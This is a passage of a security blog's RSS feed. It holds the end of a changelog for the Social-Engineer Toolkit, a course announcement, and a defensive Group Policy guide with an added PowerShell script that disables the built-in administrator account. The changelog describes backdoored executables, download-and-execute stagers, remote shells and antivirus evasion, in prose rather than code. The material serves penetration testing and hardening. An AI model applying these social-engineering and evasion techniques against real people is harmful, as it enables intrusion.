 * added the ability to keep execution flow of the backdoored executable (thanks pure_hate), this is now configurable through the config/set_config but disabled by default<br />
 * added a new option in config/set_config to allow customized user-agent strings when doing web_cloning..some websites only support certain browser versions, this will allow you to change to whatever browser you want<br />
 * changed the user agent string from mozilla firefox 3.6 to be Windows 7 IE 8, more compatibility with websites: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)<br />
 * removed the ability to be able to use spear phishing or wireless attack vectors on Windows for now<br />
 * converted src/webattack/web_clone/cloner.py to be the standard import for setcore, it was from src.core import setcore as core, changed to from src.core.setcore import *<br />
 * bug fix when launching java applet attack and metasploit in 3.0 would cause the listener to not spawn properly<br />
 * bug fix when selecting the SET interactive shell it would not copy the proper executable to pack/obfuscate<br />
 * bug fix that would cause the last exploit in spear phishing to not show a number<br />
 * changed some output on wget to use -O instead of standard moves to filenames, much cleaner<br />
 * major bug fix on how the listener and SET interactive shell handled non-encrypted communications<br />
 * added proper encryption/decryption routines to interactive shell and set listener<br />
 * added the ability to leverage partial encryption/decryption of communications to interactive shell and listener<br />
 * fixed a bug that would cause the shell to not work properly due to an invalid content length when parsing through payload<br />
 * fixed a bug that would prompt for port on SET interactive shell even after it was specified<br />
 * rewrote fasttrack mssql attack vector to be windows compliant &#8211; had to switch off pexpect and move to os.system with unthreaded http server modules<br />
 * added verbose messaging to attack vectors that are not yet supported for SET<br />
 * rehauled multiattack to support windows-based attacks &#8211; it also now prompts if invalid payloads are selected<br />
 * fixed a bug that when selecting menu 99 within multiattack, would say invalid selection. it now properly exits<br />
 * increased the response time for using the SET interactive shell, it now loads much quicker<br />
 * added a new config option to either use a staged downloader or download the SET interactive shell directory, this new feature is best for A/V detection but might be a little slower on what the user experiences. All of my testing shows that it doesn&#8217;t however I&#8217;m also not testing over the Internet. The main problem is the staged downloader does a download/exec which would get flagged by AV. The SET interactive shell on the other hand is a wrapped python interpreter so its much harder to detect and flag with signatures. This new config option can be turned on to support staged configs if you aren&#8217;t worried about A/V.<br />
 * added new options within payloadprep.py (SET Interactive Shell prep) to detect the new config change options and flag the SE Interactive Shell as the main staged downloader<br />
 * rewrote the Java Applet attack including the jar file to incorporate the straight staged downloader<br />
 * added a new attack vector that I&#8217;ve been promising for several months called the QRCode Generator Attack Vector.. Create a QRCode with a URL then create a SET attack vector to assist with the attack<br />
 * added new set menus to setcore so when you launch set there&#8217;s some new ascii art&#8230; yea i got a little bored<br />
 * fixed a bug that would cause the new stager option to not work within the Fast-Track MSSQL bruter menu<br />
 * added a check to see if metasploit path was found, if not it will limit payloads only to SE Toolkit ones<br />
 * added better handling around metasploit path detection and trigger error message when msf path is not set<br />
 * added checking in set.py to detect attack vectors that require metasploit<br />
 * added a new cleanup routine that circles through directories cleaning up remnants of things saved out during normal operation<br />
 * rewrote portions of teensy payloads to support windows<br />
 * fixed a bug that would cause the menu to not load properly randomly (randrange was from 1 to 8 versus 2 to 8)<br />
 * added permission change to executable on ratteserver so that it will always function normally if execute flag is removed<br />
 * fixed a path issue with RATTEServer that would cause it to not properly load and flag an issue<br />
 * converted RATTEServer to os.system versus pexpect child.spawn &#8211; easily more portable and less reliance on a third party module<br />
 * added RATTEServer for Windows (Cygwin mod) to support Windows operating system<br />
 * added RATTEServer to payload selection list to now be supported via windows operating systems<br />
 * added RATTEServer to payloadprep and spawn.py to deploy RATTEServer based on operating system i.e. windows/posix<br />
 * added the ability to import custom binaries into windows versus linux only mode<br />
 * fixed a bug in RATTEServer that would flag an error when spawning RATTE on Windows<br />
 * added a chmod +x routine per each run of set instance if posix is detected.. will make it easier if certain permissions aren&#8217;t set properly<br />
 * added the ability to natively copy ratteserver.binary and cygwin to program_junk to be run<br />
 * added payloadprep detailed error logging to the default log file being generated by SET<br />
 * rehauled java applet to add additional features and re-compiled and signed<br />
 * rewrote portions of shellcodeexec for better a/v avoidance</p>
]]></content:encoded>
			<wfw:commentRss>https://www.secmaniac.com/blog/2012/02/20/the-social-engineer-toolkit-set-3-0-wethrowbaseballs-has-been-released/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Blackhat Training on The Social-Engineer Toolkit!</title>
		<link>https://www.secmaniac.com/blog/2012/02/15/blackhat-training-on-the-social-engineer-toolkit/</link>
		<comments>https://www.secmaniac.com/blog/2012/02/15/blackhat-training-on-the-social-engineer-toolkit/#comments</comments>
		<pubDate>Wed, 15 Feb 2012 02:32:23 +0000</pubDate>
		<dc:creator>relik</dc:creator>
				<category><![CDATA[February 2012]]></category>

		<guid isPermaLink="false">http://www.secmaniac.com/?p=970</guid>
		<description><![CDATA[Greetings all! Have some great news. I&#8217;ll be teaching a course at Blackhat on the Social-Engineer Toolkit (SET). The course is designed to teach you everything you ever needed to know about SET and how to effectively use it during a penetration test. You&#8217;ll even get a free signed book of Metasploit: The Penetration Testers [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.secmaniac.com/files/sec-update.png" alt="" /></p>
<p>Greetings all! Have some great news. I&#8217;ll be teaching a course at Blackhat on the Social-Engineer Toolkit (SET). The course is designed to teach you everything you ever needed to know about SET and how to effectively use it during a penetration test. You&#8217;ll even get a free signed book of Metasploit: The Penetration Testers Guide :-) </p>
<p>For more information or to register, head over to here: <a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html" title="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</a>. You&#8217;ll also get a free Teensy device that we&#8217;ll be programming during the class! If you are a penetration tester, or wanting to get into it.. This is your course. Learn how to write your own modules, customize your own attacks, build your attack off your company and have a high level of success.</p>
<p><b>Course description:</b></p>
<p><b>OVERVIEW:</b></p>
<p>The Social-Engineer Toolkit is an open-source standard for penetration testers to test the effectiveness of their overall education and awareness programs. SET is designed to couple sophisticated and targeted attacks and leverage the human element to make an extremely large attack. SET has been featured on BBC, the History channel, and a number of other media outlets and used by penetration testers across the world. This course will cover how to leverage sophisticated attack vectors using the social-engineer toolkit and how to customize it during a penetration test.</p>
<p><b>SOME ADDITIONAL INFORMATION:</b></p>
<p>Here&#8217;s SET on the History channel: <a href="http://vimeo.com/34539161">http://vimeo.com/34539161</a><br />
Talk I did that has some portions of SET at Defcon 19: <a href="http://vimeo.com/29282237">http://vimeo.com/29282237</a><br />
DerbyCon talk with Kevin Mitnick includes SET: <a href="http://vimeo.com/31663242">http://vimeo.com/31663242</a></p>
<p><b>WHO SHOULD ATTEND:</b></p>
<p>Penetration testers, security enthusiasts, IT personnel<br />
Student requirements, experience/expertise: those with basic experience of Linux and penetration testing</p>
<p><b>WHAT TO BRING:</b></p>
<p>Students must have a virtual machine or computer with the latest BackTrack Linux distribution. Students must also have a Windows XP or Windows 7 machine which can be fully patched to perform the social-engineering attacks on.</p>
<p><b>MATERIALS SUPPLIED:</b></p>
<p>A copy of the book Metasploit: The Penetration Testers Guide<br />
A free Teensy device used to perform social-engineering attacks</p>
<p>Look forward to seeing everyone there, giving free hugs, and dumping my brain on you! <a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html">Register here!!</a></p>
]]></content:encoded>
			<wfw:commentRss>https://www.secmaniac.com/blog/2012/02/15/blackhat-training-on-the-social-engineer-toolkit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Disabling Local Administrators through GPO on Server 2008</title>
		<link>https://www.secmaniac.com/blog/2012/02/14/disabling-local-administrators-through-gpo-on-server-2008/</link>
		<comments>https://www.secmaniac.com/blog/2012/02/14/disabling-local-administrators-through-gpo-on-server-2008/#comments</comments>
		<pubDate>Tue, 14 Feb 2012 17:45:24 +0000</pubDate>
		<dc:creator>relik</dc:creator>
				<category><![CDATA[February 2012]]></category>

		<guid isPermaLink="false">http://www.secmaniac.com/?p=965</guid>
		<description><![CDATA[One of the common techniques I generally use during a penetration test is often referred to as pivoting or leap frogging. Essentially, when you compromise one machine, the information on the single server often yields a second or multiple compromises on an infrastructure. For example, say I compromise a member DC within a domain and [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.secmaniac.com/files/sec-update.png" alt="" /></p>
<p>One of the common techniques I generally use during a penetration test is often referred to as pivoting or leap frogging. Essentially, when you compromise one machine, the information on that single server often yields a second compromise, or multiple compromises, across an infrastructure. For example, say I compromise a member DC within a domain and dump the SAM database. The local administrator account hashes are extracted and can be used on almost any server within the domain at that point. Other common techniques revolve around token/kerberos impersonation and leveraging other techniques for gaining access to other systems. I decided that we no longer needed the local administrator accounts on any of our systems and wanted to go ahead and disable them. There is a group policy setting to change the local administrator account name as well as disable it. This works like a champ on Server 2003; however, it does not on 2008. Server 2008 introduced a requirement that a second administrator account be active on the machine before the default account can be disabled. This completely defeats the purpose of what we&#8217;re trying to accomplish here. Luckily there&#8217;s a somewhat less-known way of disabling it across every machine through group policy.</p>
<p>Before starting any of these steps, ensure that you force a name change on the administrator account through group policy. If it&#8217;s left as Not Defined, the administrator account may already have been renamed to something else on a given machine, and the scheduled task method below, which references the account by name, will not work. In our example, we renamed the local administrator to &#8220;notused&#8221;.</p>
<p>First, log into your domain controller and go to the group policy management editor. Edit whatever group policy governs your workstations and servers or both. Right click edit and navigate to: </p>
<p><b>Computer Configuration, Control Panel Settings, Scheduled Tasks</b></p>
<p>Right click on the scheduled task window and select new scheduled task.</p>
<p>You should get something that looks something like this:</p>
<p><center><img src="http://www.secmaniac.com/files/gpo_1.png" alt="" /></center></p>
<p>Ensure that &#8220;run as&#8221; is not checked in order to run as the local SYSTEM account. Fill out the information shown here: </p>
<p><center><img src="http://www.secmaniac.com/files/gpo_2.png" alt="" /></center></p>
<p>Click on the schedule tab. On the schedule tab, keep the defaults and click advanced. Enter the number of minutes you want the task to stay active. 10 minutes seemed fine to us. </p>
<p><center><img src="http://www.secmaniac.com/files/gpo_3.png" alt="" /></center></p>
<p>After that, click OK and OK. Go onto a machine and run a gpupdate /force. The local administrator account should now be disabled; this works on Server 2003, Windows 7, Vista, Server 2008, etc.</p>
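<p>The post does not show the command the scheduled task runs, so here is an added example of what I would point the task at. This is my own script, not something from the post or from Microsoft: it finds the built-in Administrator account by its well-known RID (500) rather than by the renamed name &#8220;notused&#8221;, so it still works on a machine where the rename policy has not applied yet, and it refuses to run on a domain controller, where RID 500 is the <i>domain</i> Administrator rather than a local account. The log path, the DC guard and the expected name &#8220;notused&#8221; are my assumptions. It sticks to PowerShell 2.0 cmdlets so it runs on Server 2008 / Windows 7 era hosts.</p>

```powershell
# Added example, not from the original post. Intended as the action of the GPP
# scheduled task described above, running as the local SYSTEM account.
# Assumptions (mine, not the post's): log file location, the DC guard, and the
# expected renamed account name "notused" used only for a warning.

$LogFile = Join-Path $env:SystemRoot 'Temp\disable-builtin-admin.log'

function Write-Log([string]$Message) {
    $line = '{0:u} {1}' -f (Get-Date), $Message
    Add-Content -Path $LogFile -Value $line
}

function Get-BuiltinAdministrator {
    # Only local SAM accounts; the built-in Administrator is the one whose
    # SID ends in the well-known RID 500, whatever it has been renamed to.
    Get-WmiObject Win32_UserAccount -Filter "LocalAccount=True" |
        Where-Object { $_.SID -like 'S-1-5-21-*-500' } |
        Select-Object -First 1
}

function Disable-BuiltinAdministrator {
    # Win32_ComputerSystem.DomainRole: 4 = backup DC, 5 = primary DC.
    # A DC has no local SAM; RID 500 there is the domain Administrator. Leave it.
    $role = (Get-WmiObject Win32_ComputerSystem).DomainRole
    if ($role -ge 4) {
        Write-Log "Domain controller (DomainRole=$role); not touching RID 500."
        return 0
    }

    $admin = Get-BuiltinAdministrator
    if (-not $admin) {
        Write-Log 'No RID 500 account found among local accounts; nothing to do.'
        return 1
    }

    # Warn if the rename GPO from the post has not applied yet; we still
    # disable the account because we located it by RID, not by name.
    if ($admin.Name -ne 'notused') {
        Write-Log ("RID 500 account is named '{0}', not 'notused'; rename policy not applied yet." -f $admin.Name)
    }

    if ($admin.Disabled) {
        Write-Log ("'{0}' (RID 500) is already disabled." -f $admin.Name)
        return 0
    }

    # net user exists on every Windows version this post covers (2003 through 2008/7).
    & net user "$($admin.Name)" /active:no | Out-Null
    if ($LASTEXITCODE -ne 0) {
        Write-Log ("net user failed with exit code {0} for '{1}'." -f $LASTEXITCODE, $admin.Name)
        return $LASTEXITCODE
    }

    # Re-read the account so the log reflects what the SAM actually says now.
    $after = Get-BuiltinAdministrator
    if ($after -and $after.Disabled) {
        Write-Log ("Disabled '{0}' (SID {1})." -f $after.Name, $after.SID)
        return 0
    }

    Write-Log ("net user returned success but '{0}' still shows enabled." -f $admin.Name)
    return 2
}

exit (Disable-BuiltinAdministrator)
```

<p>Save it somewhere the machines can read (a share under SYSVOL is the usual choice) and set the task&#8217;s program to <code>powershell.exe</code> with arguments <code>-NonInteractive -ExecutionPolicy Bypass -File \\yourdomain\SYSVOL\...\Disable-BuiltinAdmin.ps1</code>. A quick check after <code>gpupdate /force</code> is <code>net user notused</code>, which should print <code>Account active No</code>, and the log line in <code>%SystemRoot%\Temp</code> tells you which branch the script took on that host.</p>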
]]></content:encoded>
			<wfw:commentRss>https://www.secmaniac.com/blog/2012/02/14/disabling-local-administrators-through-gpo-on-server-2008/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

